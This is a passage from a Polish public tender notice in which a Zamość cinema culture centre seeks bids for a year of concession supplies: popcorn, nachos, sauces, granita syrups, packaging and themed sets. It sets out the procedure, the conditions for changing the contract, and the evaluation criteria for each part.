1.1	Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu, zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt III.3  ogłoszenia.
1.2	Wykonawca, który w celu potwierdzenia spełniania warunków udziału w postępowaniu,                         w stosownych sytuacjach oraz w odniesieniu do zamówienia, lub jego części, polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych, musi udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów,w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. 
1.3	Zamawiający w celu oceny, czy Wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Prawo zamówień publicznych, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda dokumentów, które określają w szczególności:
1)	zakres dostępnych Wykonawcy zasobów innego podmiotu,
2)	sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego,
3)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
4)	czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje dostawy, których wskazane zdolności dotyczą.

2.	Dokumenty dotyczące podwykonawców:
Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w  celu wykazania braku istnienia wobec nich podstaw wykluczenia    z udziału w postępowaniu, zamieszcza informacje o podwykonawcach w oświadczeniu,o którym mowa w pkt III.3 ogłoszenia.
3.	Dokumenty, które składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:
1)	Oświadczenia z pkt III.3 ogłoszenia składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. 
2)	Oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej (o którym mowa w pkt III.4 ogłoszenia), składa każdy                          z Wykonawców wspólnie ubiegających się o zamówienie.
3)	Wykonawcy dołączają do oferty pełnomocnictwo do reprezentowania ich                           w postępowaniu o udzielenie zamówienia  albo  reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Z pełnomocnikiem tym będzie prowadzona wszelka korespondencja wiążąca dla wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, przewiduje możliwość zmiany umowy w następujących sytuacjach:
1)	Zamawiający przewiduje możliwość przedłużenia terminu realizacji zamówienia wynikającego z umowy, w przypadku gdy: 
a)	w terminie wskazanym w §5 umowy nie zostanie wykorzystana maksymalna ilość i wartość umowy brutto. W takim przypadku, w drodze pisemnego aneksu, strony mogą zmienić umowę w następującym zakresie: termin zakończenia realizacji zamówienia ulegnie odpowiedniej zmianie - zostanie przedłużony do daty wskazanej przez Zamawiającego, 
b)	zaistniały okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, tj. niezwykłe i nieprzewidywalne okoliczności niezależne od strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania                              o udzielenie zamówienia publicznego.
Za niezwykłe i nieprzewidywalne okoliczności  warunkujące zmianę umowy uważać się będzie w szczególności działania osób trzecich uniemożliwiających wykonanie dostaw oraz klęski żywiołowe:
- powódź, pożar,
-silne wiatry, obfite opady atmosferyczne, ekstremalny upał lub mróz, nietypowe dla obszaru, na którym realizowany jest przedmiot umowy, szczególnie w dłuższym okresie,
-inne zdarzenia związane z działaniem sił natury, nietypowe dla tego obszaru.
Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych, których wystąpienie musi być normalnie brane pod uwagę przy składaniu ofert.
2)	W przypadku, gdy po zawarciu umowy asortyment wskazany w przedmiocie umowy zostanie wycofany z produkcji i sprzedaży (konieczne będzie przedstawienie stosownych dokumentów: oświadczenie producenta o zaistnieniu takiej okoliczności), zastąpiony będzie innym, zaakceptowanym przez Zamawiającego, o nie gorszych parametrach i nie wyższej cenie.
3)	W przypadku zmiany albo wprowadzenia nowych przepisów lub norm, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego.
4)	W przypadku zmiany ustawowej obowiązującej stawki podatku VAT Wykonawca otrzyma wynagrodzenie w wysokości ceny netto powiększonej o kwotę VAT, wyliczoną zgodnie ze stawką obowiązującą w dniu wystawienia faktury.
5)	W przypadku, gdy po zawarciu umowy Zamawiający stwierdzi lub Wykonawca zawiadomi Zamawiającego, że wystąpiły inne okoliczności, które mogą przeszkodzić prawidłowemu wykonaniu przedmiotu umowy, o ile zmiana ta nie wykracza poza przedmiot zamówienia określony w specyfikacji istotnych warunków zamówienia.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 16/12/2016, godzina: 15:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />1. Oświadczenia, wnioski, zawiadomienia oraz informacje należy przekazywać                              do Zamawiającego:
-pisemnie na adres: Centrum Kultury Filmowej Stylowy, ul. Odrodzenia 9,                       22-400 Zamość
-przy użyciu środków komunikacji elektronicznej: ckf@stylowy.net; bar@stylowy.net
2 Osoby uprawnione do kontaktów z Wykonawcami: Irena Szulga - adres e-mail: bar@stylowy.net, Tomasz Jagi  adres e-mail: ckf@stylowy.net
</div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Część 1 zamówienia  Dostawa ziarna popcornu, tłuszczu i soli oraz mieszanki karmelowej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 1 zamówienia  Dostawa ziarna popcornu, tłuszczu i soli oraz mieszanki karmelowej

1.	Przedmiot zamówienia:
a)	tłuszcz z barwnikiem i aromatem maślanym do prażenia popcornu  ilość max do 4.100 kg,
b)	sól do prażenia popcornu  ilość max do 250 kg,
c)	kukurydza do popcornu  ilość max do 10.000 kg,
d)	mieszanka karmelowa do popcornu  ilość max do 300 kg,

2.  Wymagania:
­-tłuszcz o konsystencji półpłynnej z barwnikiem i aromatem maślanym w wiaderkach powyżej 20 kg,
­-sól zmielona na pył, rozpuszczalna w tłuszczach,
­-kukurydza do popcornu wolna od GMO  udokumentowane certyfikatem, pakowana w worki powyżej 20 kg o wydajności co najmniej 27 litrów popcornu z 1 kg ziarna,
­-mieszanka karmelowa w workach do 10 kg.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>opakowanie przyjazne dla środowiska</td><td>20</td></tr><tr><td>czas dostawy produktów w przypadku reklamacji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Część 2 zamówienia  Dostawa nachos (chipsów trójkątnych smakowych) i sosów               do nachos<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 2 zamówienia  Dostawa nachos (chipsów trójkątnych smakowych) i sosów               do nachos


1.	Przedmiot zamówienia:
a)	nachos (chipsy trójkątne smakowe)  ilość max do 7.000 kg,
b)	sos serowy do nachos  ilość max do 3.200 kg,
c)	sos salsa do nachos  ilość max do 2.400 kg.

2. Wymagania:
-nachos w opakowaniach powyżej 0,5 kg,
-sos serowy do nachos w workach z możliwością podgrzewania w przeznaczonym do tego celu urządzeniu,
-sos salsa w opakowaniach o pojemności powyżej 2 kilogramów z możliwością zastosowania pompki  do nalewania,
-wyposażenie Zamawiającego w podgrzewacz do nachos (1 szt.) - obejmujące dzierżawę, dostawę, instalację, serwis  i uruchomienie podgrzewacza,
-wyposażenie Zamawiającego w podgrzewacz do sosu serowego z dozownikiem odpowiednio dobranym do worka (1 szt.) - obejmujące dzierżawę, dostawę, instalację, serwis i uruchomienie podgrzewacza.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>opakowanie przyjazne dla środowiska</td><td>20</td></tr><tr><td>czas dostawy produktów w przypadku reklamacji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Część 3 zamówienia  Dostawa opakowań do popcornu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 3 zamówienia  Dostawa opakowań do popcornu

1.	Przedmiot zamówienia:
a)	kubek do popcornu o pojemności ok. 5 l -  ilość max do 20.000 szt.,
b)	kubek do popcornu o pojemności ok. 3 l -  ilość max do 46.000 szt.,
c)	kubek do popcornu o pojemności ok. 2 l -  ilość max do 35.500 szt.,
d)	kubek do popcornu o pojemności ok. 1 l -  ilość max do 24.000 szt.


2.	Wymagania:
-kubki do popcornu z uniwersalnym wzorem, stabilne po złożeniu,
-certyfikat spełnienia wymagań przez wyrób przeznaczony do bezpośredniego kontaktu            z żywnością
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39222120-1, 39222100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>opakowanie przyjazne dla środowiska</td><td>20</td></tr><tr><td>czas dostawy produktów w przypadku reklamacji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b> Część 4 zamówienia  Dostawa opakowań do nachos (chipsów trójkątnych)<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 4 zamówienia  Dostawa opakowań do nachos (chipsów trójkątnych)

 
 1.  Przedmiot zamówienia:
a)	opakowanie - szalka do nachos mała o pojemności 50 - 80 g   ilość max                   do 25.000 szt.,
b)	opakowanie - szalka do nachos duża o pojemności 100 - 150 g  ilość  max                do 36.000 szt.


2. Wymagania:
-szalka do nachos mała i duża przezroczysta, dwudzielna,
­-wykonane z tworzywa o odpowiedniej grubości, która pozwala utrzymać ciężar do 320 g dużych nachos i 200 g małych, nie powodując wyginania szalki,
­-certyfikat spełnienia wymagań przez wyrób przeznaczony do bezpośredniego kontaktu z żywnością.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39222100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>opakowanie przyjazne dla środowiska</td><td>20</td></tr><tr><td>czas dostawy produktów w przypadku reklamacji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Część 5 zamówienia  Dostawa opakowań do napoju mrożonego granita<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 5 zamówienia  Dostawa opakowań do napoju mrożonego granita

1.  Przedmiot zamówienia:
a)	opakowanie - kielich do napoju granita (L) o pojemności do 350 ml,                             komplet z dekielkiem i słomką   ilość max do 1.500 szt.,
b)	opakowanie - kielich do napoju granita (XL) o pojemności do 400 ml,                             komplet z dekielkiem i słomką  ilość  max do 1.300 szt.
     
     
2.	Wymagania:
-kielich duży i mały przeroczysty, zamykany szczelnie dekielkiem, w  którym umieszczona jest słomka z zatyczką  zapobiegającą  wylewaniu się napoju,
-certyfikat spełnienia wymagań przez wyrób przeznaczony do bezpośredniego kontaktu z żywnością.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39222100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>oakowanie przyjazne dla środowiska</td><td>20</td></tr><tr><td>czas dostawy produktów w przypadku reklamacji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Część 6 zamówienia  Dostawa syropów do napoju mrożonego granita<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 6 zamówienia  Dostawa syropów do napoju mrożonego granita


1.	Przedmiot zamówienia:
a)	syrop o smakach owocowych do napoju granita  ilość max do 250 litrów.

2.	Wymagania:
-syropy nie zawierające konserwantów w kartonach do 10 litrów z kranikiem                       do nalewania
-wyposażenie Zamawiającego w 1 szt. granitora /maszynę/ do produkcji i nalewania napoju mrożonego granita z trzema pojemnikami 10 litrów  - obejmujące dzierżawę, dostawę, instalację, serwis i uruchomienie granitora
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>opakowanie przyjazne dla środowiska</td><td>20</td></tr><tr><td>czas dostawy produktów w przypadku reklamacji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Część 7 zamówienia  Dostawa orzeszków Crispers Felix<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 7 zamówienia  Dostawa orzeszków Crispers Felix


1.	Przedmiot zamówienia:
a)	orzeszki Crispers Felix w pakiecie z kubeczkami -  ilość max do 72 kartonów                  /12x650g/


2.	Wymagania:
-orzeszki przygotowane jako produkt specjalny do sprzedaży w kinach, posiadający w  pakiecie kubeczki z pokrywkami jednorazowego użytku,
-wyposażenie Zamawiającego w podgrzewacz do orzeszków (1szt.) - obejmujące dzierżawę, dostawę, instalację, serwis i uruchomienie podgrzewacza
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>opakowanie przyjazne dla środowiska</td><td>20</td></tr><tr><td>czas dostawy produktów w przypadku reklamacji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Część 8 zamówienia  Dostawa opakowań do popcornu i napoju w zestawie <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 8 zamówienia  Dostawa opakowań do popcornu i napoju w zestawie 


1.	Przedmiot zamówienia:
a)	zestaw  pojemnik na popcorn + kubek na napój + figurka  -  ilość max do 3.000 kpl.

2.	Wymagania:
-zestaw  z motywami premierowego filmu - pojemnik na popcorn z przegródką przeznaczoną na kubek do napoju, kubek zamykany pokrywką ze słomką                          oraz umieszczoną figurką /postacią z filmu/,
-certyfikat spełnienia wymagań przez wyrób przeznaczony do bezpośredniego kontaktu z żywnością
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39222120-1, 39222100-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>opakowanie przyjazne dla środowiska</td><td>20</td></tr><tr><td>czas dostawy produktów w przypadku reklamacji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Część 9 zamówienia  Dostawa napojów bezalkoholowych i wody mineralnej w butelkach oraz produktów do przygotowywania napojów bezalkoholowych z dystrybutora: syropu, gazu CO2, kubków jednorazowych, pokrywek, słomek<br /><div style="padding-left: 20px"><b>
